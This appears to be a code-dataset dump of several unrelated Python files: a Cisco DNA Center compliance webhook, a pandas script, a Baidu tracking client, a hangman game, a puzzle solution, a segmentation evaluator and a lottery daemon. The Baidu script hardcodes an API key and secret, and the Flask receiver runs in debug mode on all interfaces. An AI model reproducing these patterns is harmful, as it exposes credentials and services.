with compliance result\n card_message = {\n \"roomId\": room_id,\n \"parentId\": message_id,\n \"markdown\": \"Device Compliance\",\n \"attachments\": [\n {\n \"contentType\": \"application/vnd.microsoft.card.adaptive\",\n \"content\": {\n \"$schema\": \"http://adaptivecards.io/schemas/adaptive-card.json\",\n \"type\": \"AdaptiveCard\",\n \"version\": \"1.0\",\n \"body\": [\n {\n \"type\": \"TextBlock\",\n \"text\": \"Device Compliance\",\n \"weight\": \"bolder\"\n },\n {\n \"type\": \"FactSet\",\n \"facts\": facts\n }\n ],\n 
\"actions\": [\n {\n \"type\": \"Action.openURL\",\n \"title\": \"Device Compliance\",\n \"url\": 'https://10.93.141.45/dna/provision/devices/inventory/device-details?deviceId=' + device_id + '&defaultTab=Summary'\n }\n ]\n }\n }\n ]\n }\n response = webex_apis.post_room_card_message(WEBEX_ROOM, card_message)\n\n print('\\nCompliance Status message posted')\n\n # check config compliance state\n if compliance_status['RUNNING_CONFIG'] == 'NON_COMPLIANT':\n # trigger workflow to identify what has changed\n\n # send command runner API for \"show run\" and \"show start\"\n show_run_result = dnac_api.command_runner.run_read_only_commands_on_devices(deviceUuids=[device_id], commands=['show running-config'])\n show_run_task_id = show_run_result['response']['taskId']\n time.sleep(5) # for pacing the API calls\n show_start_result = dnac_api.command_runner.run_read_only_commands_on_devices(deviceUuids=[device_id], commands=['show startup-config'])\n show_start_task_id = show_start_result['response']['taskId']\n\n # wait for Command Runner APIs to execute\n print('\\nWait for Command Runner APIs tasks to complete')\n time_sleep(30)\n\n # collect the show running output file\n show_run_task_result = dnac_api.task.get_task_by_id(task_id=show_run_task_id)\n show_run_file_info = show_run_task_result['response']['progress']\n show_run_file_id = json.loads(show_run_file_info)['fileId']\n print('\\n\\nThe show running file id:', show_run_file_id)\n\n show_run_file_result = dnac_api.file.download_a_file_by_fileid(file_id=show_run_file_id, save_file=False)\n # the function will return data encoded using\n # \n\n # retrieve the running config\n show_run_file_json = json.loads(show_run_file_result.data.decode('utf-8'))\n show_run_file_content = show_run_file_json[0]['commandResponses']['SUCCESS']['show running-config'].replace('show running-config','')\n\n # remove all the config lines before version\n show_run_file_updated = show_run_file_content.split('version')[1]\n\n # save the running config to file\n run_file = device_hostname + '_run.txt'\n f_temp = open(run_file, 'w')\n f_temp.write(show_run_file_updated)\n f_temp.seek(0) # reset the file pointer to 0\n f_temp.close()\n\n # collect the show startup-config output file\n show_start_task_result = dnac_api.task.get_task_by_id(task_id=show_start_task_id)\n show_start_file_info = show_start_task_result['response']['progress']\n show_start_file_id = json.loads(show_start_file_info)['fileId']\n print('The show startup-config file id:', show_start_file_id)\n\n show_start_file_result = dnac_api.file.download_a_file_by_fileid(file_id=show_start_file_id, save_file=False)\n # the function will return data encoded using\n # \n\n # retrieve the startup config\n show_start_file_json = json.loads(show_start_file_result.data.decode('utf-8'))\n show_start_file_content = show_start_file_json[0]['commandResponses']['SUCCESS']['show startup-config'].replace(\n 'show startup-config', '')\n\n # remove all the config lines before version\n show_start_file_updated = show_start_file_content.split('version')[1]\n\n # save the startup config to file\n start_file = device_hostname + '_start.txt'\n f_temp = open(start_file, 'w')\n f_temp.write(show_start_file_updated)\n f_temp.seek(0) # reset the file pointer to 0\n f_temp.close()\n\n print('The running config and startup config have been collected and saved to files')\n\n # check for the config diff\n diff_result = compare_configs(start_file, run_file)\n print('\\n\\nThe Config Diff:\\n', diff_result)\n\n # save the diff to file\n 
diff_file = device_hostname + '_diff.txt'\n f_temp = open(diff_file, 'w')\n f_temp.write(diff_result)\n f_temp.seek(0) # reset the file pointer to 0\n f_temp.close()\n\n body = [\n {\n \"type\": \"TextBlock\",\n \"text\": \"Device Configuration Changes\",\n \"weight\": \"bolder\"\n },\n {\n \"type\": \"TextBlock\",\n \"wrap\": True,\n \"text\": \"There are differences between the \\nRunning Configuration and Start Configuration.\"\n },\n {\n \"type\": \"TextBlock\",\n \"wrap\": True,\n \"text\": \"Lines marked wth '+' have been added to the Running Configuration, \\nLines marked with '-' have been removed from the Running Configuration\"\n }\n ]\n\n # prepare the Webex message with diff config\n\n diff_result_update_message = diff_result.replace(\"\\n+\", \"\\n'+' \")\n diff_result_update_final = diff_result_update_message.replace(\"\\n-\", \"\\n'-' \")\n\n body.append({'type': 'TextBlock', 'text': diff_result_update_final, \"wrap\": True, \"color\": \"attention\"})\n\n card_message = {\n \"roomId\": room_id,\n \"parentId\": message_id,\n \"markdown\": \"Device Configuration Changes\",\n \"attachments\": [\n {\n \"contentType\": \"application/vnd.microsoft.card.adaptive\",\n \"content\": {\n \"$schema\": \"http://adaptivecards.io/schemas/adaptive-card.json\",\n \"type\": \"AdaptiveCard\",\n \"version\": \"1.0\",\n \"body\": body\n }\n }\n ]\n }\n\n response = webex_apis.post_room_card_message(WEBEX_ROOM, card_message)\n\n print('\\nConfig Diff Webex message posted')\n\n # prepare CLI templates\n diff_result_update = diff_result.replace('\\n+', '\\nno')\n diff_result_final = diff_result_update.replace('\\n-', '\\n')\n\n print('\\nRemediation CLI Template:\\n', diff_result_final)\n\n # create Ansible Playbook\n source_file = \"project.yml\"\n ansible_file = device_hostname + '.yml'\n\n with open(source_file) as file:\n data_list = yaml.load(file, Loader=yaml.SafeLoader)\n\n data_dict = data_list[0]\n data_dict['vars']['cli_template'] = diff_result_final\n\n final_data = [data_dict]\n\n with open(ansible_file, 'w') as file:\n yaml.dump(final_data, file, default_flow_style=False)\n\n # upload the Ansible playbook file to Webex\n card_message = {\n \"roomId\": room_id,\n \"parentId\": message_id,\n \"markdown\": \"Ansible Playbook\",\n \"attachments\": [\n {\n \"contentType\": \"application/vnd.microsoft.card.adaptive\",\n \"content\": {\n \"$schema\": \"http://adaptivecards.io/schemas/adaptive-card.json\",\n \"type\": \"AdaptiveCard\",\n \"version\": \"1.0\",\n \"body\": [\n {\n \"type\": \"TextBlock\",\n \"text\": \"Ansible Playbook\",\n \"weight\": \"bolder\"\n },\n {\n \"type\": \"TextBlock\",\n \"wrap\": True,\n \"text\": \"Here is attached the Ansible Playbook to remediate the configuration drift\"\n },\n {\n \"type\": \"TextBlock\",\n \"wrap\": True,\n \"text\": \"Execute the attached file by using the command:\\n\"\n },\n {\n \"type\": \"TextBlock\",\n \"wrap\": True,\n \"text\": 'ansible-playbook -e \"device_name=' + device_hostname + ' dnac_host=' + dnac_ip + '\" ' + ansible_file\n }\n ]\n }\n }\n ]\n }\n\n response = webex_apis.post_room_card_message(WEBEX_ROOM, card_message)\n time.sleep(2)\n response = webex_apis.post_room_file(WEBEX_ROOM, ansible_file, 'text/plain', message_id)\n\n print('\\nAnsible Playbook uploaded to Webex')\n\n return 'Notification Received', 202\n else:\n return 'Method not supported', 405\n\n\n@app.route('/compliance_check_data', methods=['GET']) # API endpoint to return the compliance check activity data, consumption by other apps\n@basic_auth.required\ndef 
compliance_check_data():\n print('File \"compliance_check_data.log\" requested, transfer started')\n return send_from_directory('', 'compliance_check_data.log', as_attachment=True)\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', debug=True, ssl_context='adhoc')\n\n\n\n\n","repo_name":"cisco-en-programmability/dnacenter_compliance","sub_path":"compliance_check_receiver.py","file_name":"compliance_check_receiver.py","file_ext":"py","file_size_in_byte":25113,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"28093487978","text":"import pandas as pd\n# import numpy as np\n# import statsmodels.api as sm\n\nstudents = pd.read_excel('students2.xlsx', sheet_name='students')\n\n# Create dummies\n# cat_vars = ['Description', 'Date', 'Continent', 'AcademicYear', 'Status', 'Category', 'StudentCode', 'Scholarship', 'ScholarshipCategory', 'Chosen']\ncat_vars = ['Chosen']\nfor var in cat_vars:\n cat_list = pd.get_dummies(students[var], prefix=var, drop_first=True)\n students = students.join(cat_list)\n students.drop(columns=var, inplace=True)\n\nprint(\"Chosen: \" + str(students.info()))\n\nY = students[['Chosen_Yes']]\nX = students.drop(columns='Chosen_Yes')\n\nprint(\"X: \" + str(X))\nprint(\"Y\\\\: \" + str(Y))\n#\n# logit_model = sm.Logit(Y, X)\n# result = logit_model.fit()\n# print(result.summary())\n\ncorrMatrix = X.corr(method ='pearson')\ncorrMatrix.to_excel(excel_writer = \"students_output.xlsx\")\n\n\n\n# print (corrMatrix)\n# print(\"corrMatrix: \" + str(corrMatrix))\n# print (corrMatrix.info())\n#\n# import xlsxwriter\n# workbook = xlsxwriter.Workbook('students_output.xlsx')\n# worksheet = workbook.add_worksheet()\n# row = 0\n# for col, data in enumerate(corrMatrix):\n# worksheet.write_column(row, col, data)\n#\n# workbook.close()\n#\n#\n","repo_name":"ermalaliraj/credit_risk_analytics","sub_path":"createDummy.py","file_name":"createDummy.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"42518949232","text":"# -*- coding: utf-8 -*-\r\n# !/usr/bin/env python\r\nimport os\r\nimport requests\r\nimport base64\r\nimport json\r\nfrom pprint import pprint\r\nimport time\r\nimport io\r\nfrom io import BytesIO\r\nimport cv2\r\nimport numpy as np\r\nfrom PIL import Image\r\nimport glob\r\n\r\n# client_id 为官网获取的AK, client_secret 为官网获取的SK\r\napi_key = '02YtCG7XbgFUiQSby7Q5qLG3'\r\nsecret_key = 'AO2nvbYyIE3vsab3K1OoCWRdiSIUgkoQ'\r\n\r\n\r\nclass Traffic_flowRecognizer(object):\r\n def __init__(self, api_key, secret_key):\r\n self.access_token = self._get_access_token(api_key=api_key, secret_key=secret_key)\r\n self.API_URL = 'https://aip.baidubce.com/rest/2.0/image-classify/v1/body_tracking' + '?access_token=' + self.access_token\r\n # 获取token\r\n\r\n @staticmethod\r\n def _get_access_token(api_key, secret_key):\r\n api = 'https://aip.baidubce.com/oauth/2.0/token?grant_type=client_credentials&client_id={}&client_secret={}'.format(api_key, secret_key)\r\n rp = requests.post(api)\r\n if rp.ok:\r\n rp_json = rp.json()\r\n print(rp_json['access_token'])\r\n return rp_json['access_token']\r\n else:\r\n print('=>Error in getaccesstoken!')\r\n\r\n def get_result(self, params):\r\n rp = requests.post(self.API_URL, data=params)\r\n if rp.ok:\r\n print('= >Success! gotresult: ')\r\n rp_json = rp.json()\r\n pprint(rp_json)\r\n return rp_json\r\n else:\r\n print('=>Error! 
token invalid or network error!')\r\n            print(rp.content)\r\n            return None\r\n    # crowd flow counting\r\n\r\n    def detect(self):\r\n        ### after sampling frames from the video at 5 fps, read the images one after another\r\n        WSI_MASK_PATH = 'left-right-test1' # folder path holding the images\r\n        images = os.listdir(WSI_MASK_PATH)\r\n        images.sort(key=lambda x:int(x.split('.')[0]))\r\n        data_list = []\r\n        for i in images:\r\n            f = open(WSI_MASK_PATH + '/' + i, 'rb')\r\n            img_str = base64.b64encode(f.read())\r\n            data_list.append(img_str)\r\n            params = {'dynamic': 'true', 'area': '1,543,400,543,400,1,1,1', 'case_id': 1018, 'case_init': 'false',\r\n                      'image': img_str, 'show': 'true'}\r\n            tic = time.perf_counter()  # time.clock() was removed in Python 3.8\r\n            rp_json = self.get_result(params)\r\n            toc = time.perf_counter()\r\n            print('Processing time per frame: ' + '%.2f' % (toc - tic) + ' s')\r\n            img_b64encode = rp_json['image']\r\n            img_b64decode = base64.b64decode(img_b64encode) # base64 decode\r\n            # display the detection result image\r\n            # image = io.BytesIO(img_b64decode)\r\n            # img = Image.open(image)\r\n            # img.show()\r\n            # save the detection result image\r\n            file = open('./test_result/' + str(i) + '.jpg', 'wb')\r\n            file.write(img_b64decode)\r\n            file.close()\r\n\r\n\r\nif __name__ == '__main__':\r\n    recognizer = Traffic_flowRecognizer(api_key, secret_key)\r\n    recognizer.detect()","repo_name":"MingBusinessman/BaiduAPI","sub_path":"other sourcecode.py","file_name":"other sourcecode.py","file_ext":"py","file_size_in_byte":3035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
{"seq_id":"2105569981","text":"\"\"\"\nName(s):Charlotte, Alexandra\nName of Project:Hangman\n\"\"\"\n\n#Write the main part of your program here. Use of the other pages is optional.\n\n\n#import page2 # uncomment if you're using page2\n#import page3 # uncomment if you're using page3\n#import page4 # uncomment if you're using page4\n\nimport page1\nimport random \nimport os\n\nALL_GUESSES = []\nnumber_of_answers = 3\n\ndifficulty = input(\"Choose a difficulty level: easier or harder:\")\n\nif difficulty == 'easier' or difficulty == 'Easier':\n    word = random.choice(page1.easier)\nif difficulty == 'harder' or difficulty == 'Harder': \n    word = random.choice(page1.harder)\ncharacters = len(word)\nprint(\"There are\", characters, \"letters in this word. You have 10 tries to guess letters and 3 tries to guess the complete word at any point\")\n\n\nlis = list(word)\n\nguess = input(\"Guess a letter/word:\")\nALL_GUESSES.append(guess)\n\n\n\n\ndef provide_clue(word):\n    masked_word = '_' * len(word)\n\n    for g in ALL_GUESSES:\n        p = -1\n        if g in word:\n            p = word.index(g)\n\n        if p >= 0:\n            temp = list(masked_word)\n            temp[p] = g\n            masked_word = \"\".join(temp)\n\n    return masked_word\n\ndef clear_screen():\n    os.system(\"clear\")\n\n\nwhile len(ALL_GUESSES) > 0 and number_of_answers > 0:\n    position = -1\n\n    if len(guess) == 1:\n        if guess in lis:\n            print(\"Correct\")\n            position = word.index(guess)\n        \n        else: \n            print(\"Incorrect\")\n        \n    \n    if len(guess) > 1:\n        if guess == word:\n            print(\"Congrats! You guessed the word!\")\n            break\n        else: \n            print(\"Incorrect\")\n            number_of_answers = number_of_answers - 1\n    \n    if len(ALL_GUESSES) == 10:\n        print(\"Oh no! You're out of guesses for letters :(\")\n        print(\"The word was:\", word)\n        break \n\n    if number_of_answers == 0: \n        print(\"Oh no! You're out of guesses for the word :(\")\n        print(\"The word was:\", word)\n        break\n\n    \n    \n    \n    \n\n    progress = provide_clue(word)\n\n    if progress == word:\n        print(\"Congrats! You guessed it! 
The word was\", word)\n break\n \n progress = f\"Progress: {progress}\" \n msg = \"Total guesses: %s\" % len(ALL_GUESSES)\n msg += \"\\n%s\\n\" % \", \".join(ALL_GUESSES)\n\n clear_screen()\n guess = input(f\"{progress}\\n{msg}\\n\\nGuess another letter/word: \")\n ALL_GUESSES.append(guess)\n\n\n \n\n \n ","repo_name":"huntercollegehighschool/cs9-final-project-charlottewillenbring","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"18814273804","text":"# population\n\nfrom collections import deque\n\ndef make_union(row, col, num):\n union[row][col] = num\n sum_lst[num] += A[row][col]\n cnt_lst[num] += 1\n uni_lst[num].append((row, col))\n if row + 1 < n and l <= abs(A[row][col] - A[row + 1][col]) <= r and union[row + 1][col] == -1:\n make_union(row + 1, col, num)\n if col + 1 < n and l <= abs(A[row][col] - A[row][col + 1]) <= r and union[row][col + 1] == -1:\n make_union(row, col + 1, num)\n if row - 1 >= 0 and l <= abs(A[row][col] - A[row - 1][col]) <= r and union[row - 1][col] == -1:\n make_union(row - 1, col, num)\n if col - 1 >= 0 and l <= abs(A[row][col] - A[row][col - 1]) <= r and union[row][col - 1] == -1:\n make_union(row, col - 1, num)\n return 0\n\nn, l, r = map(int, input().split())\n\nA = [[] for _ in range(n)]\n\nfor i in range(n):\n A[i] = list(map(int, input().split()))\n\n\nresult = 0\nwhile result <= 2000:\n union = [[-1] * n for _ in range(n)]\n uni_lst = [[] for _ in range(n * n)]\n sum_lst = [0] * (n * n)\n cnt_lst = [0] * (n * n)\n num = 0\n for row in range(n):\n for col in range(n):\n is_union = False\n if union[row][col] == -1:\n make_union(row, col, num)\n num += 1\n\n\n if num != n*n:\n for i in range(num):\n for x, y in uni_lst[i]:\n A[x][y] = sum_lst[i]//cnt_lst[i]\n result += 1\n else:\n break\n\nprint(result)\n\n\n","repo_name":"salixkang/python-algorithm-practice","sub_path":"Book/DFS,BFS/13-7.py","file_name":"13-7.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"29339200007","text":"import os\r\nimport sys\r\nimport argparse\r\nimport yaml\r\nimport numpy as np\r\nimport pandas as pd\r\nimport glob\r\nfrom skimage import io\r\nfrom pprint import pprint\r\nimport re\r\nimport pathlib\r\n\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.colors as colors\r\n\r\n\r\ndef read_pred_gt_data(path_pred, path_gt): \r\n \r\n # read data from path\r\n pred = io.imread(path_pred)\r\n gt = io.imread(path_gt)\r\n \r\n # process pred and gt\r\n new_width = min(pred.shape[0], gt.shape[0]) # perhaps one pixel shift, so to make their shape the same\r\n new_height = min(pred.shape[1], gt.shape[1])\r\n\r\n pred = pred[:new_width, :new_height]\r\n gt = gt[:new_width, :new_height]\r\n\r\n # turn 255 in gt or pred to 1\r\n pred[pred>0] = 1\r\n gt[gt>0] = 1\r\n \r\n return pred, gt\r\n\r\n\r\ndef visualize_diff(pred, gt, thres, path_out):\r\n \r\n # diff = gt - pred\r\n colour_dict = {-1: colors.to_rgb('crimson'), # false positive\r\n 0: colors.to_rgb('gainsboro'),\r\n 1: colors.to_rgb('blue')} # false negative\r\n \r\n colours_rgb = [colour_dict[i] for i in [-1, 0, 1]]\r\n colours_rgb = colors.ListedColormap(colours_rgb)\r\n\r\n # here, the values of gt and pred should be 0 and 1.\r\n # the values of diff: -1 (false positive), 0, 1 (false negative)\r\n diff = gt - pred \r\n \r\n plt.figure(figsize=(50, 50))\r\n 
plt.axis('off')\r\n    \r\n    path_out_diff = os.path.join(path_out, \"diff.png\")\r\n    plt.imshow(diff, cmap=colours_rgb, vmin=-1, vmax=1)\r\n    plt.savefig(path_out_diff, bbox_inches='tight')\r\n    \r\n    path_out_gt = os.path.join(path_out, \"gt.png\")\r\n    plt.imshow(gt)\r\n    plt.savefig(path_out_gt, bbox_inches='tight')\r\n    \r\n    path_out_pred = os.path.join(path_out, \"mask_pred_binary\"+str(thres)+\".png\")\r\n    plt.imshow(pred)\r\n    plt.savefig(path_out_pred, bbox_inches='tight')\r\n\r\n\r\ndef calculate_iou(pred, gt):\r\n\r\n    # IoU calculation = intersection / union\r\n    intersection = np.logical_and(pred, gt)\r\n    union = np.logical_or(pred, gt)\r\n    iou_score = np.sum(intersection) / np.sum(union)\r\n    \r\n    return iou_score\r\n\r\n\r\ndef calculate_precision(pred, gt):\r\n    \r\n    # precision = TP (true positive) / AP (all predicted positive)\r\n    TP = np.sum(np.logical_and(pred, gt))\r\n    AP = np.sum(pred)\r\n    precision_score = TP / (AP + 1e-6)\r\n    \r\n    return precision_score\r\n\r\n\r\ndef calculate_recall(pred, gt):\r\n    \r\n    # recall = TP / PP (all positive in gt)\r\n    TP = np.sum(np.logical_and(pred, gt))\r\n    PP = np.sum(gt) \r\n    recall_score = TP / (PP + 1e-6)\r\n    \r\n    return recall_score\r\n\r\n\r\ndef calculate_f1(pred, gt):\r\n    \r\n    # f1 = 2 * precision * recall / (precision + recall)\r\n    precision = calculate_precision(pred, gt)\r\n    recall = calculate_recall(pred, gt)\r\n    f1_score = 2 * precision * recall / (precision + recall + 1e-6)\r\n    \r\n    return f1_score\r\n\r\n\r\ndef evaluate_metrics(pred, gt):\r\n    \r\n    eval_dict = {}\r\n    \r\n    recall = calculate_recall(pred, gt)\r\n    precision = calculate_precision(pred, gt)\r\n    f1 = calculate_f1(pred, gt)\r\n    iou = calculate_iou(pred, gt)\r\n    \r\n    eval_dict[\"recall\"] = recall\r\n    eval_dict[\"precision\"] = precision\r\n    eval_dict[\"f1\"] = f1\r\n    eval_dict[\"iou\"] = iou\r\n    \r\n    return eval_dict\r\n    \r\n    \r\ndef filter_epoch_folder(path_list):\r\n    \r\n    def sort_key(s):\r\n        # Extract the numerical part if the string starts with 'epoch'\r\n        if s.startswith('epoch'):\r\n            return int(re.findall(r'\\d+', s)[0])\r\n        # Return a high value for other strings so that they come at the end\r\n        return float('inf')\r\n\r\n    sorted_files = sorted(path_list, key=sort_key)\r\n\r\n    sorted_files_epoch = []\r\n\r\n    for item in sorted_files:\r\n        if item.startswith(\"epoch\"):\r\n            sorted_files_epoch.append(item)  \r\n\r\n    return sorted_files_epoch\r\n    \r\n\r\n# main function for predicted results from many epochs\r\n# path_pred is the parent directory of all results from different epochs\r\n# to create a csv to record all of the results \r\ndef main(path_pred, path_gt, thres, size):\r\n    \r\n    epoch_list = os.listdir(path_pred)\r\n    sorted_epoch_list = filter_epoch_folder(epoch_list)\r\n    \r\n    epoch_namelist = [ep_name[5:] for ep_name in sorted_epoch_list]\r\n    \r\n    accuracy_results = {\r\n        'epoch': epoch_namelist,\r\n        'f1': [],\r\n        'iou': [],\r\n        'recall': [],\r\n        'precision': []\r\n    }\r\n\r\n    if size == \"small\" or size == \"large\" or size == \"small_augmentation\":\r\n        for epoch in sorted_epoch_list:\r\n\r\n            # path of predicted results\r\n            path_pred_out = os.path.join(path_pred, epoch, \"pred_mask_bin\"+str(thres)+\".tif\")\r\n            path_pred_diff = os.path.join(path_pred, epoch)\r\n\r\n            # read predicted binary mask and gt mask\r\n            pred, gt = read_pred_gt_data(path_pred_out, path_gt)\r\n\r\n            # evaluate \r\n            eval_result = evaluate_metrics(pred, gt)\r\n\r\n            accuracy_results[\"recall\"].append(eval_result[\"recall\"])\r\n            
accuracy_results[\"precision\"].append(eval_result[\"precision\"])\r\n accuracy_results[\"f1\"].append(eval_result[\"f1\"])\r\n accuracy_results[\"iou\"].append(eval_result[\"iou\"])\r\n\r\n # visualize images, gt, and predicted binary mask\r\n visualize_diff(pred, gt, thres, path_pred_diff)\r\n\r\n # Create the DataFrame\r\n df = pd.DataFrame.from_dict(accuracy_results)\r\n\r\n # Save to CSV\r\n csv_file = os.path.join(path_pred, 'accuracy_results.csv')\r\n df.to_csv(csv_file, index=False)\r\n\r\n print(f'{csv_file} has been created successfully!')\r\n \r\n elif size == \"noFT\":\r\n # path of predicted results\r\n path_pred_out = os.path.join(path_pred, \"pred_mask_noFT.tif\")\r\n \r\n # read predicted binary mask and gt mask\r\n pred, gt = read_pred_gt_data(path_pred_out, path_gt)\r\n\r\n # evaluate \r\n eval_result = evaluate_metrics(pred, gt)\r\n \r\n # visualize images, gt, and predicted binary mask\r\n visualize_diff(pred, gt, thres, path_pred)\r\n \r\n print(path_pred_out)\r\n pprint(eval_result)\r\n \r\n \r\nif __name__ == '__main__':\r\n \r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('--data', default=None, help=\"Dagaha2017 Djibo2019...\")\r\n parser.add_argument('--upsample', default=\"1024\", help=\"1024 or SR\") \r\n parser.add_argument('--size', default=\"small\", help=\"small or large or noFT\") \r\n parser.add_argument('--uptype', default=\"\", help=\"nearest bilinear EDSR\") \r\n parser.add_argument('--thres', default=0.5, help=\"the threshold to determine the binary map\") \r\n \r\n # path_data = \"path of your data folder\" # e.g. \"/home/usr/Data\"\r\n path_data = \"/home/yunya/anaconda3/envs/Data\"\r\n \r\n # read prompts\r\n args = parser.parse_args()\r\n data_name = args.data\r\n size = args.size\r\n upsample = args.upsample\r\n uptype = args.uptype\r\n thres = args.thres\r\n\r\n # testing data\r\n if upsample == \"1024\":\r\n path_test_data = os.path.join(path_data, data_name, \"raw\", \"test\")\r\n path_pred = os.path.join('outputs', data_name, size, upsample)\r\n \r\n elif upsample == \"SR\":\r\n path_test_data = os.path.join(path_data, data_name, \"SAM\", upsample, \"test\")\r\n path_pred = os.path.join('outputs', data_name, size, upsample, uptype)\r\n \r\n pathlib.Path(path_pred).mkdir(parents=True, exist_ok=True)\r\n path_gt = glob.glob(os.path.join(path_test_data, \"gt\") + \"/*.tif\")[0]\r\n\r\n # run the main function\r\n main(path_pred, path_gt, thres, size)\r\n ","repo_name":"YunyaGaoTree/SAM-Adapter-For-Refugee-Dwelling-Extraction","sub_path":"run_sam/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":7664,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"21205812760","text":"#!/usr/bin/python3\n\n#==============================================================================\n # Assignment: Milestone 3, lottery ticket generator daemon\n #\n # Author: Derek Chan\n # Language: Python\n #\n # To Compile: \n #\n # Class: Python for Programmers: Sockets and Security DPI912\n # Professor: Harvey Kaduri\n # Due Date: 2020-10-27\n # Submitted: 2020-12-06\n #\n #-----------------------------------------------------------------------------\n #\n # Description: Update the daemon so that it is able to take start/stop commands, also\n # separate the daemon from the terminal that started the process with double fork\n #\n # Collaboration: \n #\n # Input: The daemon will accept a connection to a client, the child process of the daemon will\n # receive the ticket 
type and ticket amount.\n #\n # Output: Daemon child process will generate the numbers for the type of ticket it is requested to\n # do and send it back to the client as a string.\n #\n # Algorithm: The parent process of the daemon will constantly be listening for connections, once\n # a connection arrives, the parent will attempt to fork and have the child process handle the request,\n # the child process will then send the ticket data back to the client and exit.\n #\n # Required Features Not Included: \n #\n # Known Bugs: Not sure how to have the -stop command delete the directory after, program will keep thinking\n # that the process is running even though it isnt due to the directory for the daemon process still existing\n #\n # Classification: Will be attempting prototype B, uncertain if this meets A's requirements\n #\n#==============================================================================\n\nimport argparse\nimport atexit\nimport errno\nimport logzero\nimport os\nimport random\nimport signal\nimport socket\nimport sys\nimport time\n\nfrom logzero import logger\nfrom socket import *\nfrom signal import *\n\n#defining the function childHandler to check for zombie processes, will kill if there are any\ndef childHandler(signalNumber, frame):\n while True:\n try:\n pid, status = os.waitpid(-1, os.WNOHANG)\n except OSError:\n return\n if pid == 0:\n return\n\n#defining the function to log numbers in a file for the daemon before sending them to the user\ndef logNumbers(ticketNumbers):\n logger.info(f'Child: {os.getpid()} is storing generated ticket numbers: \\n {ticketNumbers}')\n\n#The requestHandler function is used by child processes so they know how to handle\n#a client request, the function will receive the ticket type and amount from the client \n#and call the generateTicket Function to create the tickets. 
Ticket data is sent back to client\ndef requestHandler(socketConnection):\n clientRequest = socketConnection.recv(128)\n clientData = clientRequest.decode('utf-8')\n clientData = list(clientData.split(' '))\n ticketResults = generateTicket(clientData[0], int(clientData[1]))\n socketConnection.send(ticketResults.encode('utf-8'))\n \n#This functions purpose is handling the creation of tickets.\n#it will match the parameters provided to the corresponding ticket type and loop based on amount needed\ndef generateTicket(requestedType, requestedAmount):\n lotteryPool = []\n temporaryString = ''\n\n if(requestedType == '649'):\n #for loop used to generate new pool of numbers\n #and create a temporary ticket to store the numbers picked\n for i in range(0, int(requestedAmount)):\n lotteryPool = list(range(1, 50))\n #numbers in the pool are shuffled each time the for loop is called\n #a number is popped from the lotteryPool list and saved into pickedNumber variable\n #the number is then appended to a temporaryTicket list\n for j in range(0, 6):\n random.shuffle(lotteryPool)\n pickedNumber = lotteryPool.pop()\n temporaryString += str(pickedNumber)\n if(j < 5):\n temporaryString += ', '\n if(i < (int(requestedAmount)-1)):\n temporaryString += '\\n'\n\n elif(requestedType == 'max'):\n #for loop used to generate new pool of numbers\n #and create a temporary ticket to store the numbers picked\n for i in range(0, int(requestedAmount)):\n lotteryPool = list(range(1, 51))\n #loop to add sets of six numbers in a temporarySet list\n for j in range(0, 3):\n #numbers in the pool are shuffled each time the for loop is called\n #a number is popped from the lotteryPool list and saved into pickedNumber variable\n #the number is then appended to a temporarySet list\n for k in range(0, 7):\n random.shuffle(lotteryPool)\n pickedNumber = lotteryPool.pop()\n temporaryString += str(pickedNumber)\n if(k < 6):\n temporaryString += ', '\n #once a set of numbers is completed, it is added to the temporaryTicket list\n if(j < 2):\n temporaryString += '/'\n #once all the sets of numbers are added to the temporary ticket, it is added to ticketList\n #ticketList stores all the tickets generated in a list to be displayed later\n if(i < (int(requestedAmount) - 1)):\n temporaryString += '\\n'\n\n elif(requestedType == 'dg'):\n #for loop used to generate new pool of numbers\n #and create a temporary ticket to store the numbers picked\n #a bonus pool list is also created for the special number from 1 to 7\n for i in range(0, int(requestedAmount)):\n lotteryPool = list(range(1, 50))\n bonusPool = list(range(1, 8))\n #numbers in the pool are shuffled each time the for loop is called\n #a number is popped from the lotteryPool list and saved into pickedNumber variable\n for j in range(0, 5):\n random.shuffle(lotteryPool)\n pickedNumber = lotteryPool.pop()\n temporaryString += str(pickedNumber)\n if(j <= 4):\n temporaryString += ', '\n #numbers in the bonus pool are shuffled then popped as the last number for the ticket\n random.shuffle(bonusPool)\n pickedNumber = bonusPool.pop()\n temporaryString += str(pickedNumber)\n if(i < (int(requestedAmount) -1)):\n temporaryString += '\\n'\n \n logNumbers(temporaryString)\n return temporaryString\n\n#The run daemon function purpose is setting up the parent process to listen for connections\n#and fork itself if needed when client requests arrive\ndef runDaemon():\n requestQueueSize = 100\n try:\n parentSocket = socket(AF_INET6, SOCK_STREAM)\n parentSocket.setsockopt (SOL_SOCKET, SO_REUSEADDR, 1)\n 
parentSocket.bind(connectionData)\n        parentSocket.listen(requestQueueSize)\n        signal(SIGCHLD, childHandler)\n        print(f'Listening on port: {daemonPort}')\n        while True:\n            try:\n                socketConnection, clientAddress = parentSocket.accept()\n            except IOError as e:\n                code, msg = e.args\n                if (code == errno.EINTR):\n                    continue\n                else:\n                    raise\n            \n            try:\n                pid = os.fork()\n            except OSError:\n                sys.stderr.write('Failed to create child process')\n                continue\n            \n            #if process is a child, it will close the parent connection and that connection will now be passed\n            #to the child process instead, requestHandler function is then called to handle the request\n            if (pid == 0):\n                parentSocket.close()\n                requestHandler(socketConnection)\n                socketConnection.close()\n                os._exit(0)\n            else:\n                socketConnection.close()\n    except Exception as error:\n        print(error)\n        parentSocket.close()\n\n#defining the function to fully daemonize and separate the program from the CLI\ndef daemonize(pidFile, *, \n              stdin='/dev/null', \n              stdout='/dev/null', \n              stderr='/dev/null'):\n    \n    #checks to see if Daemon is already 